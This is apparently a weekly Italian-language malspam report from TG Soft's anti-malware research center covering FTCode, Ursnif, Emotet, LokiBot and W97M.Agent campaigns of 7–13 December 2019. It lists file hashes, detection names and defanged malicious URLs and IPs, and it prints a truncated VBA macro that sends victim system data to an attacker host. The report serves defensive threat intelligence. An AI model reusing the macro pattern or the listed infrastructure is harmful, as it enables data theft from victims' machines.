Selected news item is not available in the requested language.

Italian language proposed.

Close

09/12/2019
18:34

2019W49 Report settimanale => 07-13/12 2K19 campagne MalSpam target Italia

Malware veicolati attraverso le campagne: FTCode, Ursnif, Emotet, LokiBot e W97M.Agent
       
week42

Report settimanale delle campagne italiane di malspam a cura del C.R.A.M. di TG Soft.

Di seguito i dettagli delle campagne diffuse in modo massivo nella settimana appena trascorsa dal 07 dicembre 2019 al 13 dicembre 2019: Ursnif, Emotet, LokiBot, FTCode, W97M.Agent

INDICE

 ==> 09 dicembre 2019 => FTCode - LokiBot - Ursnif - Emotet
 
 ==> 10 dicembre 2019 => Emotet - LokiBot

 ==> 11 dicembre 2019 => Ursnif - Emotet

 ==> 12 dicembre 2019 => Emotet - LokiBot - W97M.Agent

 ==> 13 dicembre 2019 => Emotet
 
 ==> Consulta le campagne del mese di Novembre


09 dicembre 2019

FTCode

 

ScanDocumento__60277fa4d53f30427b688d8a99ff8a3cb.vbs
MD5: 111629748e62cf22f381eedf8b7ed9e4
 Dimensione: 3145729 Bytes
VirITTrojan.VBS.Dwnldr.BWN
WindowsIndexingService.vbs
MD5: eae3510e1da8d14f8b96e38283804b78
Dimensione: 229144 Bytes
VirITTrojan.VBS.FTCode.BWM

IOC:
111629748e62cf22f381eedf8b7ed9e4
eae3510e1da8d14f8b96e38283804b78
p://way.securewebgateway[.]com
p://www.luigicafagna[.]it
p://ese.emarv[.]com

 



Torna ad inizio pagina

LokiBot


PI 7635427 E DOCUMENTI DI PAGAMENTO_PDF.exe
MD56c7bf873c01b860653858441ed78f28a
Dimensione: 142848 Bytes
VirITTrojan.Win32.Genus.BWK

IOC:
6c7bf873c01b860653858441ed78f28a

p://onllygooodam[.]com 


Torna ad inizio pagina

Ursnif


MIL0001785236.xls
MD5: C5E1106F9654A23320132CBC61B3F29D
Dimensione: 64000 Bytes
VirIT: X97M.Downloader.BWK


Payload Ursnif
MD5: 4B2D76784A93662DC60317E011464ED6
Dimensione: 176128 Bytes
VirIT: Trojan.Win32.Ursnif.BWK

 
Versione: 214107
Gruppo: 2052
Key: 10291029JSJUYUON



IOC:
C5E1106F9654A23320132CBC61B3F29D
4B2D76784A93662DC60317E011464ED6

sutsyiekha[.]casa/microsoft.com?03000200-0400-0500-0006-000700080009
94.100.28[.]184


Torna ad inizio pagina

Emotet 


Certificato medico-4673298_06-12-2019_5_.doc
MD5: e4863940ac5c23ecb0962a909d6e336a
Dimensione: 91097 Bytes
VirIT: W97M.Downloader.BWJ

CHUNKERTCG.EXE
MD5: c1adfcc38051d2223e34787ee9f68d8d
Dimensione: 647199 Bytes
VirITTrojan.Win32.Emotet.BWK


IOC:
e4863940ac5c23ecb0962a909d6e336a
c1adfcc38051d2223e34787ee9f68d8d

s://nagel.pintogood[.]com/wp-admin/nge9688/
p://recreate.bigfilmproduction[.]com/wp-includes/2x8vf9j1507/
s://www.nineti9[.]com/6ui7m/xlswdj6/
p://invision-me[.]com/wp-includes/9z37501/
p://hanaimchurch[.]net/j6d645b/059dgrz7/

Torna ad inizio pagina 

 

10 dicembre 2019

Emotet


Fattura 96189.doc
MD5: 5fc5c8fb0eae111150be9a64566bd737
Dimensione: 180918 Bytes
VirIT: W97M.Downloader.BWM

printsxcl.exe
MD5: 2f9cac9175a4c6ffaf2890c89dd49c25
Dimensione: 491520 Bytes
VirITTrojan.Win32.Emotet.BWN


IOC:
5fc5c8fb0eae111150be9a64566bd737
2f9cac9175a4c6ffaf2890c89dd49c25

p://myphamthuydung[.]com/tmp/bwo
p://lalletera[.]cat/bootstrap/ilym/
s://www.primepenguin[.]com/wp-admin/fefkbm/
s://www.ukrembtr[.]com/wp-admin/s3OYk/
s://shourayinfotech[.]xyz/wp-includes/pa1uxi/
 

Torna ad inizio pagina

LokiBot


confermare la SPEDIZIONE UPS 4765232__PDF.exe
MD5: f8ea2be7b5abacf2729d7e3936bc6fa3
Dimensione: 265216 Bytes
VirIT: Trojan.Win32.Genus.BWM

IOC:
f8ea2be7b5abacf2729d7e3936bc6fa3

p://onllygooodam[.]com


Risorsa trovato all'interno del file analizzato:
 




Torna ad inizio pagina

 

11 dicembre 2019

Ursnif



Nuovo documento 1.vbs
MD5: DC04DA0A3714C62362C8711161AE19AF
Dimensione: 4032719  Bytes
VirIT: Trojan.VBS.Dwnldr.BWO


ColorPick.exe
MD5: E5CF434F3D54C1882B1366C2DCD1CF3E
Dimensione: 177176  Bytes
VirIT: Trojan.Win32.Ursnif.BWO

 
Versione: 300814
Gruppo: 20198141
Key: Hr21hSYlL7OMQFRy



IOC:
DC04DA0A3714C62362C8711161AE19AF
E5CF434F3D54C1882B1366C2DCD1CF3E

p://customerspick[.]com/lqqx?yfrri=158194
p://hintdeals[.]com/paginfo52.php
s://sscupace[.]xyz

  

Emotet



Info.doc
MD571ed5b79d9156d6048de3d2a4e537865
Dimensione: 74384 Bytes
VirITW97M.Downloader.MP
printsxcl.exe
MD50687f6677026a09a9df7cc96bd47bd22
Dimensione: 430243 Bytes
VirITTrojan.Win32.Emotet.BWO 
IOC:
71ed5b79d9156d6048de3d2a4e537865
0687f6677026a09a9df7cc96bd47bd22

p://modiracc[.]com/wp-admin/k6f1/
p://www.billrothhospitals[.]com/wp-includes/99nooe0/
p://opticsbd[.]com/office365.login.com/8q70079/
p://birdlandonetoone[.]com/blogs/ie9co6496/
p://860259[.]com/tmp/hm92/

12 dicembre 2019

Emotet


MESSAGIO_2019_4735096.doc
MD5: db3c9463d878b05ca1a222c7dbcd60b0
Dimensione: 171135 Bytes
VirIT: W97M.Downloader.BWP

printsxcl.exe
MD5: 15d8bf6f8d53844f367076f25ea43bc8
Dimensione: 338927 Bytes
VirITTrojan.Win32.Emotet.BVX


IOC:
db3c9463d878b05ca1a222c7dbcd60b0
15d8bf6f8d53844f367076f25ea43bc8

p://jdcc-stu[.]com/wp-includes/6109/
p://jandmadventuring.servermaintain[.]com/wp-content/uploads/8ly08u77849/
p://wilkopaintinc[.]com/common_resource/qac395/
p://essemengineers[.]com/AdminPanel/cku0s00262/
p://t666v[.]com/vlk2lo4i/fi20416/
Torna ad inizio pagina

LokiBot


pagamento rapido.exe
MD5: 68574c499813aed2b3b28d507d013515
Dimensione: 925184 Bytes
VirIT: Trojan.Win32.PSWStealer.BWQ


IOC:
68574c499813aed2b3b28d507d013515

p://elettroveneta-it[.]com
31.31.72[.]73
Torna ad inizio pagina
 
 

W97M.Agent.BWS


sda-express-108943.doc
MD5: 649c2d11a4a58f0101ed016c73355e32
Dimensione: 94900 Bytes
VirITW97M.Agent.BWS


La MACRO presente all'interno del file DOC in allegato alla mail contiene il seguent codice:

Function Main()
    Dim myURL As String
    myURL = Base64DecodeString("aHR0cDovLzE5Mi4yMzYuMTU1LjE3L2luZm8xLnBocD9pZD0=") & Base64EncodeString(GetDocName & "|" & GetComputerInfo & "|" & GetOSInfo & "|" & GetAV & "|" & GetProc)
[...]
End Function

Function GetAV()
[...]
End Function

Function GetProc()
[...]
End Function

Function GetDocName()
[...]
End Function

Function GetComputerInfo()
[...]
End Function

Function GetOSInfo()
[...]
End Function
 

L'URL a cui vengono inviati i dati estrapolati dal computer della vittima è http://192.236.155[.]17/info1.php?id=, i dati che vengono prelevati attivando la MACRO presente nel documento Word sono:
"document_name:"
"computer_name:"
"user_name:"
"domain:"
"domain_role:"
"workgroup:"
"manufacturer:"
"model:"
"system_type:"
"av:"
"processes:"
"os_name:"
"os_version:"

Gli allegati Word di questa campagna sono composti da una parte fissa ed un numero variabile, questo numero identifica l'ID della vittima e di conseguenza l'indirizzo email della vittima.

Esempio: sda-express-[ID NUMERICO].doc



IOC:
649c2d11a4a58f0101ed016c73355e32
 
p://192.236.155[.]17/info1.php?id=

sda-express[.]xyz - IP: 104.168.218.127
sda-express[.]icu - IP: 104.168.218.226
sdaexpress[.]icu  - IP: 104.168.219.27
Torna ad inizio pagina

13 dicembre 2019

Emotet


Info 1312 KT_7730572
MD5: 19045e4fb253f3d4e77c21295f0d43df
Dimensione: 74471 Bytes
VirIT: W97M.Downloader.BWR

printsxcl.exe
MD5: 58d5232431beddec9e549a5378cffd2a
Dimensione: 307200 Bytes
VirITTrojan.Win32.Emotet.BWR


IOC:
19045e4fb253f3d4e77c21295f0d43df
58d5232431beddec9e549a5378cffd2a

p://gunnertalk[.]com/wp-admin/2z07/
p://hasbrew[.]com/includes/zw21y53110/
p://greencrosscc[.]com/contact-form/7c457119/
p://gessuofk[.]net/test/6ns631/
p://rampbay[.]com/var/r3kb2/
Torna ad inizio pagina
 

Consulta le campagne del mese di Novembre/Dicembre

Vi invitiamo a consultare i report del mese di Novembre/Dicembre, per rimanere aggiornati sulle campagne di malspam circolanti in Italia:

30/11/2019 = Report settimanale delle campagne italiane di Malspam dal 30 novembre al 06 dicembre 2019
23/11/2019 = Report settimanale delle campagne italiane di Malspam dal 23 novembre al 29 novembre 2019
16/11/2019 = Report settimanale delle campagne italiane di MalSpam dal 16 novembre al 22 novembre 2019

C.R.A.M. 
Centro Ricerche Anti-Malware di TG Soft 
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: